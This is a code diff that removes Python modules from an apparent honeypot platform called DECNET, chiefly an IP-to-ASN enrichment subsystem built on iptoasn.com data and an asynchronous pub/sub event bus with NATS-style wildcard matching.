from decnet.asn.factory import get_provider
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ASN_ROOT
|
||||
|
||||
# 24 h — iptoasn refreshes daily.
|
||||
REFRESH_INTERVAL_S = 86_400
|
||||
|
||||
_lookup: Optional[AsnLookup] = None
|
||||
_provider_name: Optional[str] = None
|
||||
|
||||
|
||||
def get_lookup(*, force_refresh: bool = False) -> AsnLookup:
|
||||
"""Return the cached :class:`AsnLookup`, building it on first use.
|
||||
|
||||
If the provider's data files are missing or older than
|
||||
``REFRESH_INTERVAL_S`` seconds, refresh before building. Pass
|
||||
``force_refresh=True`` to bypass the age check (used by a future
|
||||
``decnet asn refresh`` CLI command).
|
||||
"""
|
||||
global _lookup, _provider_name
|
||||
provider = get_provider()
|
||||
_provider_name = provider.name
|
||||
|
||||
if force_refresh or _files_stale(provider):
|
||||
provider.refresh()
|
||||
_lookup = None # rebuild on next access
|
||||
|
||||
if _lookup is None:
|
||||
_lookup = provider.build_lookup()
|
||||
return _lookup
|
||||
|
||||
|
||||
def enrich_ip(ip: str) -> Tuple[Optional[int], Optional[str], Optional[str]]:
|
||||
"""Return ``(asn, as_name, provider_name)`` or ``(None, None, None)``.
|
||||
|
||||
Never raises — any lookup failure collapses to all-None so the
|
||||
caller (profiler) can upsert the attacker row regardless.
|
||||
|
||||
``DECNET_ASN_ENABLED=false`` short-circuits the whole path, useful
|
||||
for tests / agent hosts / ops wanting to disable enrichment without
|
||||
touching provider config.
|
||||
"""
|
||||
if os.environ.get("DECNET_ASN_ENABLED", "true").lower() == "false":
|
||||
return (None, None, None)
|
||||
try:
|
||||
lookup = get_lookup()
|
||||
info = lookup.asn(ip)
|
||||
if info is None:
|
||||
return (None, None, None)
|
||||
return (info.asn, info.name or None, _provider_name or "unknown")
|
||||
except Exception:
|
||||
return (None, None, None)
|
||||
|
||||
|
||||
def _files_stale(provider) -> bool:
|
||||
"""True when the provider has no fresh data on disk.
|
||||
|
||||
Same semantics as :func:`decnet.geoip._files_stale`: a partial
|
||||
cache still produces correct answers for the ranges it covers.
|
||||
"""
|
||||
paths = provider.data_paths()
|
||||
if not paths:
|
||||
return True
|
||||
now = time.time()
|
||||
for p in paths:
|
||||
if p.exists() and now - p.stat().st_mtime <= REFRESH_INTERVAL_S:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
__all__ = ["get_lookup", "enrich_ip", "ASN_ROOT", "REFRESH_INTERVAL_S"]
|
||||
@@ -1,33 +0,0 @@
|
||||
"""ASN provider protocol — mirror of :mod:`decnet.geoip.base`.
|
||||
|
||||
Concrete providers (e.g. :mod:`decnet.asn.iptoasn`) implement this.
|
||||
Callers must go through :func:`decnet.asn.factory.get_provider`; never
|
||||
import a concrete provider class directly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from pathlib import Path
|
||||
from typing import Sequence
|
||||
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
|
||||
|
||||
class Provider(ABC):
|
||||
"""Abstract IP→ASN data provider."""
|
||||
|
||||
#: Short tag written to ``Attacker.asn_source`` (e.g. ``'iptoasn'``).
|
||||
name: str
|
||||
|
||||
@abstractmethod
|
||||
def refresh(self) -> None:
|
||||
"""Download / regenerate the provider's raw data files."""
|
||||
|
||||
@abstractmethod
|
||||
def build_lookup(self) -> AsnLookup:
|
||||
"""Parse the on-disk data files and return a ready-to-query lookup."""
|
||||
|
||||
@abstractmethod
|
||||
def data_paths(self) -> Sequence[Path]:
|
||||
"""Return the list of files this provider manages — used for staleness
|
||||
detection. Order is not significant."""
|
||||
@@ -1,39 +0,0 @@
|
||||
"""ASN provider factory — mirror of :mod:`decnet.geoip.factory`.
|
||||
|
||||
Dispatch key: ``DECNET_ASN_PROVIDER`` (default ``iptoasn``). Lazy
|
||||
singleton.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Optional
|
||||
|
||||
from decnet.asn.base import Provider
|
||||
|
||||
_cached: Optional[Provider] = None
|
||||
_cached_key: Optional[str] = None
|
||||
|
||||
|
||||
def get_provider() -> Provider:
|
||||
"""Return the configured :class:`Provider` singleton."""
|
||||
global _cached, _cached_key
|
||||
key = os.environ.get("DECNET_ASN_PROVIDER", "iptoasn").lower()
|
||||
if _cached is not None and _cached_key == key:
|
||||
return _cached
|
||||
|
||||
if key == "iptoasn":
|
||||
from decnet.asn.iptoasn.provider import IptoasnProvider
|
||||
provider: Provider = IptoasnProvider()
|
||||
else:
|
||||
raise ValueError(f"Unsupported ASN provider: {key!r}")
|
||||
|
||||
_cached = provider
|
||||
_cached_key = key
|
||||
return provider
|
||||
|
||||
|
||||
def reset_cache() -> None:
|
||||
"""Forget the singleton — tests swap providers via the env var."""
|
||||
global _cached, _cached_key
|
||||
_cached = None
|
||||
_cached_key = None
|
||||
@@ -1,9 +0,0 @@
|
||||
"""iptoasn.com IP→ASN provider.
|
||||
|
||||
Daily-refreshed gzipped TSV dump of the global BGP table, derived from
|
||||
RIPE RIS. Released into the public domain by upstream — no attribution
|
||||
required, no UA mandate, no terms to violate.
|
||||
|
||||
Direct imports of :class:`IptoasnProvider` are discouraged — go through
|
||||
:func:`decnet.asn.factory.get_provider`.
|
||||
"""
|
||||
@@ -1,63 +0,0 @@
|
||||
"""iptoasn.com bulk dump download.
|
||||
|
||||
One file: ``ip2asn-v4.tsv.gz``, ~5 MB compressed, refreshed daily.
|
||||
Pulled over HTTPS with the same generic UA the geoip RIR fetcher uses
|
||||
(stealth: never identify as DECNET — public-data scrapers correlated to
|
||||
honeypot operator egress is the threat model).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import shutil
|
||||
import urllib.request
|
||||
from pathlib import Path
|
||||
from typing import Tuple
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.fetch")
|
||||
|
||||
# Mirror the (name, url) tuple shape of geoip.rir.fetch so test
|
||||
# harnesses can swap one for the other.
|
||||
IPTOASN_SOURCES: Tuple[Tuple[str, str], ...] = (
|
||||
("ip2asn-v4", "https://iptoasn.com/data/ip2asn-v4.tsv.gz"),
|
||||
)
|
||||
|
||||
# Generic UA — matches geoip.rir.fetch. iptoasn.com explicitly releases
|
||||
# the data into the public domain and does NOT require an identifying UA,
|
||||
# so we keep DECNET stealth instead of advertising.
|
||||
_USER_AGENT = "Mozilla/5.0 (compatible; fetch/1.0)"
|
||||
_TIMEOUT_S = 60
|
||||
|
||||
|
||||
def fetch_all(dest: Path) -> list[Path]:
|
||||
"""Download every iptoasn file into *dest*. Returns the written paths.
|
||||
|
||||
Atomic per file: download to ``{name}.tsv.gz.tmp`` then rename. A
|
||||
partial failure leaves the previous generation intact.
|
||||
"""
|
||||
dest.mkdir(parents=True, exist_ok=True)
|
||||
written: list[Path] = []
|
||||
for name, url in IPTOASN_SOURCES:
|
||||
target = dest / f"{name}.tsv.gz"
|
||||
tmp = target.with_suffix(".gz.tmp")
|
||||
try:
|
||||
_download(url, tmp)
|
||||
tmp.replace(target)
|
||||
written.append(target)
|
||||
logger.info(
|
||||
"asn.iptoasn: fetched %s (%d bytes)",
|
||||
name, target.stat().st_size,
|
||||
)
|
||||
except Exception as exc:
|
||||
logger.error(
|
||||
"asn.iptoasn: fetch failed for %s (%s): %s", name, url, exc
|
||||
)
|
||||
if tmp.exists():
|
||||
tmp.unlink(missing_ok=True)
|
||||
# Keep any stale previous file — better outdated than empty.
|
||||
return written
|
||||
|
||||
|
||||
def _download(url: str, dest: Path) -> None:
|
||||
req = urllib.request.Request(url, headers={"User-Agent": _USER_AGENT})
|
||||
with urllib.request.urlopen(req, timeout=_TIMEOUT_S) as resp, dest.open("wb") as fh: # nosec B310 — fixed https iptoasn URL
|
||||
shutil.copyfileobj(resp, fh)
|
||||
@@ -1,78 +0,0 @@
|
||||
"""Parser for the iptoasn.com ``ip2asn-v4.tsv`` dump.
|
||||
|
||||
Line shape (gzipped, one row per BGP-announced prefix)::
|
||||
|
||||
1.0.0.0\\t1.0.0.255\\t13335\\tUS\\tCLOUDFLARENET
|
||||
|
||||
Fields: ``range_start``, ``range_end``, ``as_number``, ``country_code``,
|
||||
``as_description``. Both range columns are dotted IPv4 strings (the dump
|
||||
is IPv4-only — there's a separate ``ip2asn-v6.tsv.gz`` we don't pull).
|
||||
|
||||
Rows skipped:
|
||||
|
||||
* ``as_number == 0`` — iptoasn's sentinel for "unannounced" / private
|
||||
/ reserved space. Country may still be present (``"None"`` / two-letter
|
||||
CC) but we don't care: the geoip module owns country, ASN owns BGP.
|
||||
* Rows where either range column won't parse as IPv4.
|
||||
* Rows with fewer than 3 tab-separated columns.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import gzip
|
||||
import ipaddress
|
||||
import logging
|
||||
from pathlib import Path
|
||||
from typing import Iterator
|
||||
|
||||
from decnet.asn.lookup import AsnInfo, Range
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.parse")
|
||||
|
||||
|
||||
def parse_file(path: Path) -> Iterator[Range]:
|
||||
"""Yield ``(start_int, end_int_inclusive, AsnInfo)`` for every BGP row.
|
||||
|
||||
Accepts a gzipped path (``*.tsv.gz``); plain TSV is also fine for
|
||||
test harnesses that hand-craft small fixtures.
|
||||
"""
|
||||
opener = gzip.open if path.suffix == ".gz" else open
|
||||
with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
|
||||
for lineno, raw in enumerate(fh, 1):
|
||||
line = raw.rstrip("\n")
|
||||
if not line:
|
||||
continue
|
||||
parts = line.split("\t")
|
||||
if len(parts) < 3:
|
||||
continue
|
||||
start_s, end_s, asn_s = parts[0], parts[1], parts[2]
|
||||
# Description is the 5th column; iptoasn quotes nothing,
|
||||
# but the field can contain stray whitespace. ``""`` when
|
||||
# missing or unknown.
|
||||
name = parts[4].strip() if len(parts) >= 5 else ""
|
||||
|
||||
try:
|
||||
asn = int(asn_s)
|
||||
except ValueError:
|
||||
logger.debug(
|
||||
"asn.iptoasn: skipping malformed asn line %d in %s",
|
||||
lineno, path.name,
|
||||
)
|
||||
continue
|
||||
# ASN 0 is iptoasn's sentinel for unannounced / sentinel
|
||||
# space. Skip — there's no useful enrichment to attach.
|
||||
if asn == 0:
|
||||
continue
|
||||
|
||||
try:
|
||||
start_int = int(ipaddress.IPv4Address(start_s))
|
||||
end_int = int(ipaddress.IPv4Address(end_s))
|
||||
except (ValueError, ipaddress.AddressValueError):
|
||||
logger.debug(
|
||||
"asn.iptoasn: skipping malformed addr line %d in %s",
|
||||
lineno, path.name,
|
||||
)
|
||||
continue
|
||||
if end_int < start_int:
|
||||
continue
|
||||
|
||||
yield (start_int, end_int, AsnInfo(asn=asn, name=name))
|
||||
@@ -1,83 +0,0 @@
|
||||
"""iptoasn provider — orchestrates fetch + parse into an :class:`AsnLookup`.
|
||||
|
||||
Mirrors :class:`decnet.geoip.rir.provider.RirProvider` exactly: fetch,
|
||||
build a pickled cache, invalidate when raw files are newer than the
|
||||
cache.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from pathlib import Path
|
||||
from typing import Sequence
|
||||
|
||||
from decnet.asn.base import Provider
|
||||
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
|
||||
from decnet.asn.iptoasn.parse import parse_file
|
||||
from decnet.asn.lookup import AsnLookup
|
||||
from decnet.asn.paths import ensure_root
|
||||
|
||||
logger = logging.getLogger("decnet.asn.iptoasn.provider")
|
||||
|
||||
# Pickled lookup cache — skips re-parsing the ~580k-row gz dump on every
|
||||
# profiler restart. Rebuilt whenever any raw file is newer than the
|
||||
# cache, see ``_cache_fresh``.
|
||||
_CACHE_NAME = ".iptoasn_index.pkl"
|
||||
|
||||
|
||||
class IptoasnProvider(Provider):
|
||||
name = "iptoasn"
|
||||
|
||||
def __init__(self) -> None:
|
||||
self._root = ensure_root()
|
||||
|
||||
# ---------- Provider interface ----------
|
||||
|
||||
def refresh(self) -> None:
|
||||
logger.info("asn.iptoasn: refreshing dump into %s", self._root)
|
||||
fetch_all(self._root)
|
||||
cache = self._root / _CACHE_NAME
|
||||
if cache.exists():
|
||||
cache.unlink(missing_ok=True)
|
||||
|
||||
def build_lookup(self) -> AsnLookup:
|
||||
cache = self._root / _CACHE_NAME
|
||||
if self._cache_fresh(cache):
|
||||
try:
|
||||
lookup = AsnLookup.load(cache)
|
||||
logger.debug(
|
||||
"asn.iptoasn: loaded cached index (%d ranges)",
|
||||
len(lookup),
|
||||
)
|
||||
return lookup
|
||||
except Exception as exc:
|
||||
logger.warning(
|
||||
"asn.iptoasn: cache load failed, rebuilding: %s", exc
|
||||
)
|
||||
|
||||
ranges = []
|
||||
for path in self.data_paths():
|
||||
if not path.exists():
|
||||
continue
|
||||
ranges.extend(parse_file(path))
|
||||
lookup = AsnLookup.from_ranges(ranges)
|
||||
try:
|
||||
lookup.save(cache)
|
||||
except Exception as exc:
|
||||
logger.warning("asn.iptoasn: cache save failed: %s", exc)
|
||||
logger.info("asn.iptoasn: built index with %d ranges", len(lookup))
|
||||
return lookup
|
||||
|
||||
def data_paths(self) -> Sequence[Path]:
|
||||
return [self._root / f"{name}.tsv.gz" for name, _url in IPTOASN_SOURCES]
|
||||
|
||||
# ---------- internals ----------
|
||||
|
||||
def _cache_fresh(self, cache: Path) -> bool:
|
||||
"""True when the pickle exists and is at least as new as every raw file."""
|
||||
if not cache.exists():
|
||||
return False
|
||||
cache_mtime = cache.stat().st_mtime
|
||||
for path in self.data_paths():
|
||||
if path.exists() and path.stat().st_mtime > cache_mtime:
|
||||
return False
|
||||
return True
|
||||
@@ -1,126 +0,0 @@
|
||||
"""Provider-agnostic IP→ASN lookup.
|
||||
|
||||
A :class:`AsnLookup` is a frozen, sorted array of ``(start_ip,
|
||||
end_ip_inclusive, AsnInfo)`` ranges queried via :mod:`bisect`.
|
||||
O(log n) on ~600k ranges (a current iptoasn dump is ~580k rows).
|
||||
|
||||
Private/loopback/invalid IPv4 and all IPv6 addresses resolve to
|
||||
``None`` — the same policy :mod:`decnet.geoip.lookup` uses.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import bisect
|
||||
import ipaddress
|
||||
import pickle # nosec B403 — self-produced cache under /var/lib/decnet, never deserialized from untrusted input
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Iterable, List, Optional, Tuple
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class AsnInfo:
|
||||
"""One BGP-announced prefix's origin metadata."""
|
||||
|
||||
asn: int
|
||||
name: str # AS description / org name; "" if absent in the source data
|
||||
|
||||
|
||||
Range = Tuple[int, int, AsnInfo]
|
||||
|
||||
|
||||
@dataclass
|
||||
class AsnLookup:
|
||||
"""Indexed AS lookup over IPv4 ranges."""
|
||||
|
||||
# Parallel arrays for bisect: _starts[i] is the start-IP of the i-th
|
||||
# range, _ends[i] its inclusive end, _infos[i] its AsnInfo.
|
||||
_starts: List[int]
|
||||
_ends: List[int]
|
||||
_infos: List[AsnInfo]
|
||||
|
||||
@classmethod
|
||||
def from_ranges(cls, ranges: Iterable[Range]) -> "AsnLookup":
|
||||
"""Build a lookup from ``(start, end_inclusive, AsnInfo)`` triples.
|
||||
|
||||
Ranges are sorted by start; on identical starts, last writer
|
||||
wins (matches :class:`decnet.geoip.lookup.Lookup` semantics).
|
||||
Non-overlapping adjacency is preserved.
|
||||
"""
|
||||
sorted_ranges = sorted(ranges, key=lambda r: (r[0], r[1]))
|
||||
starts: List[int] = []
|
||||
ends: List[int] = []
|
||||
infos: List[AsnInfo] = []
|
||||
for start, end, info in sorted_ranges:
|
||||
if starts and starts[-1] == start:
|
||||
ends[-1] = end
|
||||
infos[-1] = info
|
||||
continue
|
||||
starts.append(start)
|
||||
ends.append(end)
|
||||
infos.append(info)
|
||||
return cls(starts, ends, infos)
|
||||
|
||||
def asn(self, ip: str) -> Optional[AsnInfo]:
|
||||
"""Return the :class:`AsnInfo` for ``ip`` or ``None``.
|
||||
|
||||
``None`` on: IPv6, private/loopback/link-local/multicast/reserved
|
||||
addresses, malformed strings, and IPs outside every BGP-announced
|
||||
range in the source dump.
|
||||
"""
|
||||
try:
|
||||
addr = ipaddress.ip_address(ip)
|
||||
except ValueError:
|
||||
return None
|
||||
if isinstance(addr, ipaddress.IPv6Address):
|
||||
return None
|
||||
if (
|
||||
addr.is_private
|
||||
or addr.is_loopback
|
||||
or addr.is_link_local
|
||||
or addr.is_multicast
|
||||
or addr.is_reserved
|
||||
or addr.is_unspecified
|
||||
):
|
||||
return None
|
||||
|
||||
n = int(addr)
|
||||
idx = bisect.bisect_right(self._starts, n) - 1
|
||||
if idx < 0:
|
||||
return None
|
||||
if n <= self._ends[idx]:
|
||||
return self._infos[idx]
|
||||
return None
|
||||
|
||||
def __len__(self) -> int:
|
||||
return len(self._starts)
|
||||
|
||||
# ---------- persistence ----------
|
||||
|
||||
def save(self, path: Path) -> None:
|
||||
"""Pickle the lookup to *path* (atomic rename)."""
|
||||
tmp = path.with_suffix(path.suffix + ".tmp")
|
||||
tmp.parent.mkdir(parents=True, exist_ok=True)
|
||||
with tmp.open("wb") as fh:
|
||||
pickle.dump(
|
||||
{
|
||||
"version": 1,
|
||||
"starts": self._starts,
|
||||
"ends": self._ends,
|
||||
"infos": [(i.asn, i.name) for i in self._infos],
|
||||
},
|
||||
fh,
|
||||
protocol=pickle.HIGHEST_PROTOCOL,
|
||||
)
|
||||
tmp.replace(path)
|
||||
|
||||
@classmethod
|
||||
def load(cls, path: Path) -> "AsnLookup":
|
||||
"""Load a pickled lookup from *path*."""
|
||||
with path.open("rb") as fh:
|
||||
data = pickle.load(fh) # nosec B301 — self-produced file under /var/lib/decnet
|
||||
if data.get("version") != 1:
|
||||
raise ValueError(
|
||||
f"unsupported asn-lookup index version: {data.get('version')!r}"
|
||||
)
|
||||
infos = [AsnInfo(asn=a, name=n) for a, n in data["infos"]]
|
||||
return cls(data["starts"], data["ends"], infos)
|
||||
@@ -1,18 +0,0 @@
|
||||
"""Filesystem layout for ASN data — mirror of :mod:`decnet.geoip.paths`.
|
||||
|
||||
``ASN_ROOT`` is where providers drop their raw files and cache indexes.
|
||||
Default ``/var/lib/decnet/asn``. Override with ``DECNET_ASN_ROOT`` for
|
||||
test harnesses.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
ASN_ROOT = Path(os.environ.get("DECNET_ASN_ROOT", "/var/lib/decnet/asn"))
|
||||
|
||||
|
||||
def ensure_root() -> Path:
|
||||
"""Create ``ASN_ROOT`` if absent and return it. No-op if present."""
|
||||
ASN_ROOT.mkdir(parents=True, exist_ok=True)
|
||||
return ASN_ROOT
|
||||
@@ -1,18 +0,0 @@
|
||||
"""DECNET ServiceBus — pub/sub notification substrate.
|
||||
|
||||
The bus is the notification layer for DECNET's worker constellation. The DB
|
||||
remains the source of truth for anything durable; the bus carries "something
|
||||
happened, go look" events. Delivery is at-most-once, fire-and-forget.
|
||||
|
||||
Consumers call :func:`get_bus` from :mod:`decnet.bus.factory`; never import
|
||||
transport implementations directly. The factory selects the backend via
|
||||
``DECNET_BUS_TYPE`` (``nats`` or ``fake``) and honors ``DECNET_BUS_ENABLED``.
|
||||
|
||||
Topic hierarchy is defined in :mod:`decnet.bus.topics` and locked early so
|
||||
consumers can subscribe with stable wildcard patterns.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.bus.base import BaseBus, Event, Subscription
|
||||
|
||||
__all__ = ["BaseBus", "Event", "Subscription"]
|
||||
@@ -1,92 +0,0 @@
|
||||
"""Process-wide bus singleton for request-serving workers (API, SSE routes).
|
||||
|
||||
A single connected :class:`~decnet.bus.base.BaseBus` shared across request
|
||||
handlers — opening a UNIX socket per request would be wasteful and add
|
||||
latency to the hot path. The API lifespan is responsible for calling
|
||||
:func:`close_app_bus` on shutdown; connect is lazy so tests and
|
||||
contract-test mode that never hit a publish/subscribe code path don't
|
||||
pay for a bus connection they'll never use.
|
||||
|
||||
Failures during :meth:`BaseBus.connect` are swallowed and logged — a
|
||||
dead bus must never break request serving. Publishers should treat a
|
||||
``None`` return from :func:`get_app_bus` as "skip this notification",
|
||||
same as ``DECNET_BUS_ENABLED=false``.
|
||||
|
||||
Connect is **retried with a short backoff** (not one-shot): a startup
|
||||
race where the API lifespan hits :func:`get_app_bus` before ``decnet
|
||||
bus`` is ready would otherwise poison the singleton for the entire
|
||||
process lifetime. Instead we remember the last failure timestamp and
|
||||
let callers retry once ``_RETRY_BACKOFF`` seconds have passed.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import time
|
||||
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.bus.factory import get_bus
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.app")
|
||||
|
||||
# Publishers in the hot path shouldn't pay connect-retry latency on every
|
||||
# call; the dashboard's own 5 s poll interval recovers within one tick
|
||||
# once the bus comes up. A persistently-dead bus only gets a connect
|
||||
# attempt every 2 s, not once per request.
|
||||
_RETRY_BACKOFF: float = 2.0
|
||||
|
||||
_lock = asyncio.Lock()
|
||||
_shared: BaseBus | None = None
|
||||
_last_failure_ts: float = 0.0
|
||||
|
||||
|
||||
async def get_app_bus() -> BaseBus | None:
|
||||
"""Return the process-wide connected bus, or ``None`` if unavailable.
|
||||
|
||||
On first call, constructs a client via :func:`get_bus` and awaits
|
||||
``connect()``. Subsequent calls return the cached instance. If a
|
||||
connect attempt raises, the failure timestamp is recorded and
|
||||
subsequent calls within ``_RETRY_BACKOFF`` seconds return ``None``
|
||||
without re-attempting — after the backoff window, the next call
|
||||
retries. This is what lets the API recover from a
|
||||
``decnet bus``-started-after-API race without a full API restart.
|
||||
"""
|
||||
global _shared, _last_failure_ts
|
||||
if _shared is not None:
|
||||
return _shared
|
||||
if (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF:
|
||||
return None
|
||||
async with _lock:
|
||||
if _shared is not None:
|
||||
return _shared
|
||||
if (time.monotonic() - _last_failure_ts) < _RETRY_BACKOFF:
|
||||
return None
|
||||
try:
|
||||
candidate = get_bus(client_name="api")
|
||||
await candidate.connect()
|
||||
_shared = candidate
|
||||
_last_failure_ts = 0.0
|
||||
return _shared
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning("app bus unavailable: %s", exc)
|
||||
_last_failure_ts = time.monotonic()
|
||||
return None
|
||||
|
||||
|
||||
async def close_app_bus() -> None:
|
||||
"""Close the shared bus if one is open; clear the backoff window.
|
||||
|
||||
Call from the API lifespan shutdown. Safe to call multiple times.
|
||||
Resetting ``_last_failure_ts`` means the next ``get_app_bus()``
|
||||
after shutdown-and-restart-within-the-same-process (rare, but
|
||||
tests do this) retries immediately instead of honouring a stale
|
||||
backoff.
|
||||
"""
|
||||
global _shared, _last_failure_ts
|
||||
bus, _shared = _shared, None
|
||||
_last_failure_ts = 0.0
|
||||
if bus is not None:
|
||||
try:
|
||||
await bus.close()
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning("app bus close raised: %s", exc)
|
||||
@@ -1,205 +0,0 @@
|
||||
"""Bus abstractions: the :class:`Event` envelope and the :class:`BaseBus` ABC.
|
||||
|
||||
Every transport (NATS, in-process fake, null) speaks this contract. The
|
||||
envelope is versioned (``v``) so future evolution never breaks deployed
|
||||
consumers that happen to see a newer event shape.
|
||||
|
||||
Subscription model: :meth:`BaseBus.subscribe` returns a :class:`Subscription`
|
||||
that is an async context manager AND an async iterator. The expected usage is:
|
||||
|
||||
async with bus.subscribe("topology.*.mutation.*") as sub:
|
||||
async for event in sub:
|
||||
handle(event)
|
||||
|
||||
Leaving the ``async with`` releases the underlying subscription handle; the
|
||||
transport is free to drop any buffered events after that point.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import abc
|
||||
import asyncio
|
||||
import time
|
||||
import uuid
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any, AsyncIterator
|
||||
|
||||
EVENT_SCHEMA_VERSION = 1
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Event:
|
||||
"""The bus envelope.
|
||||
|
||||
``v`` is the envelope schema version, bumped on incompatible shape
|
||||
changes. ``type`` is a short discriminator (``"mutation.applied"``,
|
||||
``"decky.state"``) useful for consumers that subscribe to a broad
|
||||
wildcard and dispatch in Python; it is redundant with the trailing
|
||||
segments of ``topic`` but cheaper to inspect. ``ts`` is epoch seconds
|
||||
(float). ``id`` is a random UUID so consumers can de-dupe if they
|
||||
ever see the same event twice (not expected at-most-once, but cheap
|
||||
insurance).
|
||||
"""
|
||||
|
||||
topic: str
|
||||
payload: dict[str, Any]
|
||||
type: str = ""
|
||||
v: int = EVENT_SCHEMA_VERSION
|
||||
ts: float = field(default_factory=time.time)
|
||||
id: str = field(default_factory=lambda: uuid.uuid4().hex)
|
||||
|
||||
def to_dict(self) -> dict[str, Any]:
|
||||
return {
|
||||
"v": self.v,
|
||||
"id": self.id,
|
||||
"topic": self.topic,
|
||||
"type": self.type,
|
||||
"ts": self.ts,
|
||||
"payload": self.payload,
|
||||
}
|
||||
|
||||
@classmethod
|
||||
def from_dict(cls, topic: str, data: dict[str, Any]) -> "Event":
|
||||
"""Reconstruct an Event from a wire-format dict.
|
||||
|
||||
``topic`` is passed explicitly because the transport knows which
|
||||
subject the message arrived on; trusting a ``topic`` field from the
|
||||
wire would let a misbehaving publisher spoof events on topics they
|
||||
don't actually publish to.
|
||||
"""
|
||||
return cls(
|
||||
topic=topic,
|
||||
payload=data.get("payload", {}) or {},
|
||||
type=data.get("type", "") or "",
|
||||
v=int(data.get("v", EVENT_SCHEMA_VERSION)),
|
||||
ts=float(data.get("ts", time.time())),
|
||||
id=data.get("id") or uuid.uuid4().hex,
|
||||
)
|
||||
|
||||
|
||||
class Subscription(abc.ABC):
|
||||
"""An open subscription — async context manager + async iterator.
|
||||
|
||||
Concrete transports subclass this and implement :meth:`_aclose` plus the
|
||||
async iterator protocol. Callers should not instantiate directly; use
|
||||
:meth:`BaseBus.subscribe`.
|
||||
"""
|
||||
|
||||
def __init__(self, pattern: str) -> None:
|
||||
self.pattern = pattern
|
||||
self._closed = False
|
||||
|
||||
async def __aenter__(self) -> "Subscription":
|
||||
return self
|
||||
|
||||
async def __aexit__(self, *exc: Any) -> None:
|
||||
await self.aclose()
|
||||
|
||||
def __aiter__(self) -> AsyncIterator[Event]:
|
||||
return self
|
||||
|
||||
async def aclose(self) -> None:
|
||||
if self._closed:
|
||||
return
|
||||
self._closed = True
|
||||
await self._aclose()
|
||||
|
||||
@abc.abstractmethod
|
||||
async def __anext__(self) -> Event: # pragma: no cover - abstract
|
||||
raise NotImplementedError
|
||||
|
||||
@abc.abstractmethod
|
||||
async def _aclose(self) -> None: # pragma: no cover - abstract
|
||||
raise NotImplementedError
|
||||
|
||||
|
||||
class BaseBus(abc.ABC):
|
||||
"""Pub/sub transport contract.
|
||||
|
||||
Implementations MUST be safe to ``await connect()`` multiple times and
|
||||
``await close()`` multiple times. Publishing to a closed bus raises
|
||||
:class:`RuntimeError`; subscribing to a closed bus does too.
|
||||
"""
|
||||
|
||||
@abc.abstractmethod
|
||||
async def connect(self) -> None:
|
||||
"""Establish any network/transport resources. Idempotent."""
|
||||
|
||||
@abc.abstractmethod
|
||||
async def publish(
|
||||
self,
|
||||
topic: str,
|
||||
payload: dict[str, Any],
|
||||
*,
|
||||
event_type: str = "",
|
||||
) -> None:
|
||||
"""Publish *payload* on *topic*. Fire-and-forget.
|
||||
|
||||
Delivery is at-most-once. On transport error the implementation
|
||||
logs and returns; it does not raise, because bus losses must not
|
||||
cascade into worker failure (DB is source of truth).
|
||||
"""
|
||||
|
||||
@abc.abstractmethod
|
||||
def subscribe(self, pattern: str) -> Subscription:
|
||||
"""Return a :class:`Subscription` that yields events matching *pattern*.
|
||||
|
||||
Patterns follow NATS wildcard semantics: ``*`` matches one topic
|
||||
token, ``>`` matches one-or-more trailing tokens. Examples:
|
||||
|
||||
* ``topology.*.mutation.applied`` — all ``applied`` events for any
|
||||
topology.
|
||||
* ``topology.abc123.mutation.*`` — all mutation states for one
|
||||
topology.
|
||||
* ``topology.>`` — every event under the ``topology`` root.
|
||||
"""
|
||||
|
||||
@abc.abstractmethod
|
||||
async def close(self) -> None:
|
||||
"""Tear down transport resources. Idempotent."""
|
||||
|
||||
async def __aenter__(self) -> "BaseBus":
|
||||
await self.connect()
|
||||
return self
|
||||
|
||||
async def __aexit__(self, *exc: Any) -> None:
|
||||
await self.close()
|
||||
|
||||
|
||||
# ─── Wildcard matching shared across in-process transports ───────────────────
|
||||
|
||||
def matches(pattern: str, topic: str) -> bool:
|
||||
"""Return True iff *topic* matches *pattern* under NATS wildcard rules.
|
||||
|
||||
``*`` matches exactly one non-empty token; ``>`` matches one-or-more
|
||||
trailing tokens (so ``topology.>`` matches ``topology.abc.x`` but not
|
||||
``topology`` alone).
|
||||
"""
|
||||
p_tokens = pattern.split(".")
|
||||
t_tokens = topic.split(".")
|
||||
for i, p in enumerate(p_tokens):
|
||||
if p == ">":
|
||||
# Must have at least one token remaining to match.
|
||||
return i < len(t_tokens)
|
||||
if i >= len(t_tokens):
|
||||
return False
|
||||
if p == "*":
|
||||
if not t_tokens[i]:
|
||||
return False
|
||||
continue
|
||||
if p != t_tokens[i]:
|
||||
return False
|
||||
return len(p_tokens) == len(t_tokens)
|
||||
|
||||
|
||||
# Sentinel used by the in-process transports to signal "no more events"
|
||||
# through the asyncio.Queue fan-out without inventing a separate control
|
||||
# channel. Not part of the wire protocol.
|
||||
